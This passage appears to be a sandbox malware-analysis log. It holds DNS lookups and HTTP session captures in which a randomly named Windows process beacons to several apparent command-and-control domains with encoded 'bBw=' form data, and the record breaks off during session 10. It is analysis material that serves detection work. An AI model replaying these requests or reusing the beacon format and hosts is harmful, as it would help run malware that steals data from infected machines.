Nov 21, 2024 16:22:56.336155891 CET | 1.1.1.1 | 192.168.2.9 | 0x6db5 | No error (0) | www.gogawithme.live | - | 209.74.77.109 | A (IP address) | IN (0x0001) | false
                                                                                                                        Nov 21, 2024 16:23:11.355724096 CET1.1.1.1192.168.2.90x9c4No error (0)www.54248711.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:26.924962044 CET1.1.1.1192.168.2.90x28dcNo error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:26.935272932 CET1.1.1.1192.168.2.90x28dcNo error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:41.896976948 CET1.1.1.1192.168.2.90x3096No error (0)www.questmatch.pro104.21.62.184A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:41.896976948 CET1.1.1.1192.168.2.90x3096No error (0)www.questmatch.pro172.67.138.37A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:56.670701981 CET1.1.1.1192.168.2.90xcd46No error (0)www.bser101pp.buzz104.21.58.90A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:23:56.670701981 CET1.1.1.1192.168.2.90xcd46No error (0)www.bser101pp.buzz172.67.158.106A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:24:11.344547987 CET1.1.1.1192.168.2.90xa454No error (0)www.3kw40881107247y.click172.67.192.207A (IP address)IN (0x0001)false
                                                                                                                        Nov 21, 2024 16:24:11.344547987 CET1.1.1.1192.168.2.90xa454No error (0)www.3kw40881107247y.click104.21.44.16A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49769 | 103.21.221.87 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:20:34.346169949 CET | 346 | OUT | GET /7yx4/?bBw=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQb1jyxz6bPKG1jNO+cUySHxdHc2K5rg==&PBk=f4VDN8Bp14IhbV HTTP/1.1
Host: www.rtpterbaruwaktu3.xyz
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:20:36.007711887 CET | 1033 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Thu, 21 Nov 2024 15:20:35 GMT
server: LiteSpeed
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49808 | 38.47.232.124 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:20:51.994584084 CET | 583 | OUT | POST /klhq/ HTTP/1.1
Host: www.70kdd.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.70kdd.top
Cache-Control: max-age=0
Content-Length: 192
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.70kdd.top/klhq/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: bBw=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2d6FYxqHfa6Q3rsnsqcrOtn5JM1K5
Nov 21, 2024 16:20:53.549953938 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:20:53 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66e01838-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49814 | 38.47.232.124 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:20:54.657236099 CET | 607 | OUT | POST /klhq/ HTTP/1.1
Host: www.70kdd.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.70kdd.top
Cache-Control: max-age=0
Content-Length: 216
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.70kdd.top/klhq/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: bBw=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+wVTk3M1o9F644uKj31F1eFzTnbmzDmhB2pcoxuG8IUiN3er3xj7Z4h04wU9KDg0BCe2t8SA0PcJ2Am1Vhf5ege9o6a8AZ6bpFizU4KiMB7+ntQIGqXGvJtR51y2p70Yp8SsNby7uiV4w5uLSDRx0PdKGKg8cDw+sZLoVk8UA==
Nov 21, 2024 16:20:56.192559958 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:20:55 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66e01838-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49823 | 38.47.232.124 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:20:57.328237057 CET | 1620 | OUT | POST /klhq/ HTTP/1.1
Host: www.70kdd.top
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.70kdd.top
Cache-Control: max-age=0
Content-Length: 1228
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.70kdd.top/klhq/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Data Ascii: bBw= [TRUNCATED]
Nov 21, 2024 16:20:58.946624041 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:20:58 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66e01838-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49831 | 38.47.232.124 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:00.002948046 CET | 335 | OUT | GET /klhq/?bBw=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ja3Sv08AkNNTw70A3KyR0Ra9u58Xeg==&PBk=f4VDN8Bp14IhbV HTTP/1.1
Host: www.70kdd.top
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:21:01.633339882 CET | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 21 Nov 2024 15:21:01 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66e01838-94"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.9  49848        199.59.243.227  80                6608  C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 21, 2024 16:21:07.550414085 CET  610                OUT        POST /w9z4/ HTTP/1.1
                                                                                                                        Host: www.acond-22-mvr.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.acond-22-mvr.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Ascii: bBw=3+GoTPvyTIkI2U/obTYErMa2uxOnq+CMUVdCM+ZmNvdD+1DtTEVdb/rFAyU2U8b03F+JRwpGITB88SFFB4MbR8mlMQaSDOZQPRNwYTeJBz96s1v9aggeWu4K1ZfQl74ETE5q6rT6hsDS0ly+rJzya9ACMP6JhniGV0QXfN7axWYRVVva+TVflLSC9G0A
Nov 21, 2024 16:21:08.677205086 CET  1236               IN         HTTP/1.1 200 OK
                                                                                                                        date: Thu, 21 Nov 2024 15:21:07 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1138
                                                                                                                        x-request-id: 8f91f411-c05e-4f46-8477-ffbad6202255
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                        set-cookie: parking_session=8f91f411-c05e-4f46-8477-ffbad6202255; expires=Thu, 21 Nov 2024 15:36:08 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 21, 2024 16:21:08.677227974 CET  591                IN
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGY5MWY0MTEtYzA1ZS00ZjQ2LTg0NzctZmZiYWQ2MjAyMjU1IiwicGFnZV90aW1lIjoxNzMyMjAyND


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.9  49854        199.59.243.227  80                6608  C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 21, 2024 16:21:10.217715979 CET  634                OUT        POST /w9z4/ HTTP/1.1
                                                                                                                        Host: www.acond-22-mvr.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.acond-22-mvr.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Ascii: bBw=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N95DnRHtQFVde/rFLSUzLsbJ3Fj8RytGITV88T1FALUaeMmnKQacMuZQPRNwYTLiBwN6vFf9aFAfI+4N/5fQh74ATE5I6pnUhuLS0li+sYztT9AICv79wCf4RGILBuTHo2A3fUTEvhcEwcSl6h9oJmWAfw9Zp2KNGdRjmSTaMA==
Nov 21, 2024 16:21:11.429151058 CET  1236               IN         HTTP/1.1 200 OK
                                                                                                                        date: Thu, 21 Nov 2024 15:21:10 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1138
                                                                                                                        x-request-id: 1b89873d-550d-42d8-bb40-b14444347d84
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                        set-cookie: parking_session=1b89873d-550d-42d8-bb40-b14444347d84; expires=Thu, 21 Nov 2024 15:36:11 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 21, 2024 16:21:11.429266930 CET  591                IN
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWI4OTg3M2QtNTUwZC00MmQ4LWJiNDAtYjE0NDQ0MzQ3ZDg0IiwicGFnZV90aW1lIjoxNzMyMjAyND


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.9  49862        199.59.243.227  80                6608  C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 21, 2024 16:21:12.889194012 CET  1647               OUT        POST /w9z4/ HTTP/1.1
                                                                                                                        Host: www.acond-22-mvr.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.acond-22-mvr.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Ascii: bBw=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N9xD70TtSm9dZ/rFCyUILsbY3FrnRyh8IRt8/x9FJaUaJ8mnIQadDOYSPRdKYTbiBwN6vGX9TwgfPO4K1ZfUl74kTExy6pzqherS0FS+puvtY9AGBv7lwCbdRFstBv39o1g3SF+u0DZau/WDtA9mLGaiRQwS5DKuXc8Kzm+mb/ELcn0IHY6JBmWpQnCdzJMBqNc4RdA9cqSrVojeyDgKabVxmBQTe9nzrlSE8Kgbnc0OAzCQN6ok9yuG9GLCFEqmeD/XJTdYf3bUZCQPvq9ZqQi7yzmsjVw7mzuRsGu9/RRTSIJPoXRAJcQsFBbmdxolp6kvFEzZEjh3WVyvfHPgdpEQR4eJJbvLuR1nEmYnpKL+7vNerAkuK6PyHkEuirBjpRtftw55yZ/fhcixA5srTlpzoiIjyuOUgJNkWl+si+bluT+QTQlDX2hr4SqGne7rzSK8tdtxwIRx9cvXlkgr8FOI7iN8R18pxS+cNAwKsts55CUnh/8QwtjN4hcblQ/sw35J6xHBerPFa788mfuoY94dkszbifwIvry7avI1SEepjJjUbK7nQ0O3+oQ5C3PXh0kxe04vfM6+MF9PeXf05rInhRRY0gZ+Vhwut7sllET5IkUE28fKSOjrKwB4k3bTgnaN/2w0DGB1R+2gUk/cZaJa3UMIAoknt3ImdJR/VJr8VNth9mWB6HK1ZDiJXPWb2td4S5H28w5Kt8qrml56bJql4QziGul0SjKyEAI2e+yvNHA0hKKFSXV9oUZ5Tjx+3OTmx28ksN3JtKl5Z0jgeeDbW1e9q4/zDcfl+nywmKfqnn1r9WY9t6doYvqlVdy+yQ890RRyvWWksYozwIdDpzdhMR2dsc4Zk618r85aMlWEQe+53dULcapE7HF99xi9No4JhoY1P/3P2rqHUl1tajwMSn5BHqvuKwMcMAdrrHD8xrW9Y1uzPw1rr6dxYHKtanisxO6x [TRUNCATED]
Nov 21, 2024 16:21:14.046539068 CET  1236               IN         HTTP/1.1 200 OK
                                                                                                                        date: Thu, 21 Nov 2024 15:21:13 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1138
                                                                                                                        x-request-id: 904ca94f-6844-4944-9cf3-f2edeca78b9c
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                        set-cookie: parking_session=904ca94f-6844-4944-9cf3-f2edeca78b9c; expires=Thu, 21 Nov 2024 15:36:13 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 21, 2024 16:21:14.046560049 CET  591                IN
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTA0Y2E5NGYtNjg0NC00OTQ0LTljZjMtZjJlZGVjYTc4YjljIiwicGFnZV90aW1lIjoxNzMyMjAyND


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.9  49870        199.59.243.227  80                6608  C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 21, 2024 16:21:15.545063972 CET  344                OUT        GET /w9z4/?PBk=f4VDN8Bp14IhbV&bBw=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfaaqVLjCwQ54vPxpQXxXjIS5xkDmSEw== HTTP/1.1
                                                                                                                        Host: www.acond-22-mvr.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 21, 2024 16:21:16.676485062 CET  1236               IN         HTTP/1.1 200 OK
                                                                                                                        date: Thu, 21 Nov 2024 15:21:15 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1466
                                                                                                                        x-request-id: 0110851f-da16-4fea-bf3a-3b5a44e1032e
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HrPV9HWYPAFlLGj0s2tnQ2+ujEMKV6GEjfnhmiRa0ldI7t4Qi0+osfXO3iKXB5EHWRBbqmlMXZq+NOoflCluoQ==
                                                                                                                        set-cookie: parking_session=0110851f-da16-4fea-bf3a-3b5a44e1032e; expires=Thu, 21 Nov 2024 15:36:16 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HrPV9HWYPAFlLGj0s2tnQ2+ujEMKV6GEjfnhmiRa0ldI7t4Qi0+osfXO3iKXB5EHWRBbqmlMXZq+NOoflCluoQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 21, 2024 16:21:16.676573038 CET  919                IN
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDExMDg1MWYtZGExNi00ZmVhLWJmM2EtM2I1YTQ0ZTEwMzJlIiwicGFnZV90aW1lIjoxNzMyMjAyND


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49887 | 146.88.233.115 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:22.965431929 CET | 607 | OUT | POST /11t3/ HTTP/1.1
Host: www.smartcongress.net
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.smartcongress.net
Cache-Control: max-age=0
Content-Length: 192
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartcongress.net/11t3/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 37 75 6c 53 46 76 73 72 72 50 42 73 53 68 33 50 34 2b 66 65 5a 6c 4c 46 7a 54 74 52 2f 39 34 38 73 5a 45 50 54 6c 41 34 2b 6c 67 79 63 34 68 76 4f 7a 70 71 45 6e 33 35 48 52 59 31 6b 61 76 72 77 6a 32 37 48 31 73 37 30 4a 49 35 43 42 50 6b 4c 4c 46 62 78 47 30 6a 61 68 68 44 44 54 2b 4f 5a 78 44 53 53 5a 38 44 48 59 4d 31 66 62 68 42 38 7a 73 64 57 34 67 4c 67 56 38 2f 72 6b 54 41 73 66 37 53 70 70 62 70 33 6a 6d 45 33 75 73 76 30 4f 58 6d 2b 62 30 4d 73 31 54 69 4e 53 38 35 6c 59 4b 79 42 32 58 31 41 41 6d 50 32 50 4c 6c
                                                                                                                        Data Ascii: bBw=Mq/wbTVEdvZa7ulSFvsrrPBsSh3P4+feZlLFzTtR/948sZEPTlA4+lgyc4hvOzpqEn35HRY1kavrwj27H1s70JI5CBPkLLFbxG0jahhDDT+OZxDSSZ8DHYM1fbhB8zsdW4gLgV8/rkTAsf7Sppbp3jmE3usv0OXm+b0Ms1TiNS85lYKyB2X1AAmP2PLl
Nov 21, 2024 16:21:24.509103060 CET | 380 | IN | HTTP/1.1 404 Not Found
content-type: text/html; charset=iso-8859-1
content-length: 196
date: Thu, 21 Nov 2024 15:21:24 GMT
server: LiteSpeed
x-tuned-by: N0C
connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49893 | 146.88.233.115 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:21:25.623847961 CET | 631 | OUT | POST /11t3/ HTTP/1.1
Host: www.smartcongress.net
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Origin: http://www.smartcongress.net
Cache-Control: max-age=0
Content-Length: 216
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.smartcongress.net/11t3/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
